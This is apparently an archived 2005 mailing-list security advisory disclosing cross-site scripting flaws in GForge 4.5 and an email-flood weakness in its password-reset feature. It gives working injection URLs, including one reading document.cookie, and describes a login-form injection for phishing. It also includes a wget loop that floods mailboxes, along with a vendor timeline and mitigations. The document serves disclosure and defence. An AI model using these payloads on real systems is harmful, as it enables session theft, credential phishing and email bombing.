Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Cross Site Scripting vulnerabilities in GForge

from [Joxean Koret] Network Security [Permanent Link]
Subject: Cross Site Scripting vulnerabilities in GForge
Date: Wed, 27 Jul 2005 22:37:16 +0200 
---------------------------------------------------------------------------
          Various Vulnerabilities in GForge 
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and 
mailing lists; tools to create and control access to Source Code
Management 
repositories like CVS and Subversion. GForge automatically creates a
repository 
and controls access to it depending on the role settings of the project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

        http://[target]/forum/forum.php?forum_id=";><script>alert('hi')</script>
        http://[target]/forum/forum.php?group_id=";><script>alert('hi')</script>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:


http://[target]/pm/task.php?func=detailtask&project_task_id=";><h1>hi!</h1>&group_id=1&group_project_id=3

3.- In the Snippets Module:

        http://[target]/snippet/detail.php?type=snippet&id=21";><iframe%
20src=http://www.playboy.com></iframe><font%20size="

4.- In the search engine:

To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in
the 
search field and press enter or try the following URL:

        http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%
3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
3E&Search=Search

5.- In other modules:


http://[target]//frs/admin/qrs.php?group_id=";><script>alert(document.cookie)</script>
        http://[target]/notepad.php?form=parent;%0d%0a-->%0d%
0a</script><body><h1>hi!</h1></body></html><!--

NOTE: (rows, cols and wrap paremeter are also vulnerables).

6.- In the Login Form:

The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
This may
be used to launch phising attacks by sending HTML e-mails (i.e.: saying
that you need 
to upgrade to the latest GForge version due to a security problem) and
putting in the 
e-mail an HTML link that points to an specially crafted url that inserts
an html form 
in the GForge login page and when the user press the login button,
he/she send the 
credentials to the attackers website.

POC. To "play" with this, simply go to the login page and insert in the
login field 
then following text: 

        "><iframe src=http://www.playboy.com></iframe><font size="

B) E-Mail Flood
~~~~~~~~~~~~~~~

The 'forgot your password?' feature allows a remote user to load a
certain URL to 
cause the service to send a validation e-mail to the specified user's
e-mail address. 
There is no limit to the number of messages sent over a period of time,
so a remote 
user can flood the target user's secondary e-mail address. E-Mail Flood,
E-Mail bomber.

The following is a "Proof Of Concept" of this vulnerability:

        [joxean@nemobox]$ while [ true ]; do
        >       wget http://[target]/account/lostpw.php?loginname=joxean
        > done

The "pending account" confirmation e-mail is also vulnerable so, a
mailicious user can
flood any e-mail box even if they are not GForge registered users.


The fix:
~~~~~~~~

There is no fix at the moment.


Workarounds:
~~~~~~~~~~~~

There are no workarounds except by using a method to automagically catch
the XSS
request such as WASP (available via CVS at
https://savannah.nongnu.org/wasp) or 
mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.


Timeline:
~~~~~~~~~

25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Attachment: signature.asc
Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Cross Site Scripting vulnerabilities in GForge, Joxean Koret <=
Previous by Date:  [OpenPKG-SA-2005.015] OpenPKG Security Advisory (spamassassin), OpenPKG
Next by Date:  Re: Re : [Firefox Bug 302187] New: Shared section vulnerability when opening microsoft office document resulting in DoS, sylvain . roger
Previous by Thread:  [OpenPKG-SA-2005.015] OpenPKG Security Advisory (spamassassin), OpenPKG
Next by Thread:  Website Baker Project Multiple Vulnerabilities, thegreatone2176
Indexes:  [Date] [Thread] [Top] [All Lists]